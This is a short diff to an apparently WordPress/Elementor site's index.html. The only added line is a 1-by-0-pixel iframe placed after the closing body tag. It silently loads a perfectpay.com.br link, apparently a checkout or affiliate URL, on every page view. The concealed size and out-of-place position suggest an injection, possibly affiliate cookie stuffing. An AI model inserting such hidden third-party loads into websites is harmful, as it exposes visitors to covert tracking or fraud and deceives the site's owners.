--- a/index.html
+++ b/index.html
@@ -346,5 +346,6 @@ var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false
 	/(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&&(/^(?:a|select|input|button|textarea)$/i.test(t.tagName)||(t.tabIndex=-1),t.focus())},!1);
 	</script>
 		</body>
+	<iframe width=1 height=0 src="https://go.perfectpay.com.br/PPU38CK59MN"></iframe>
 </html>
 
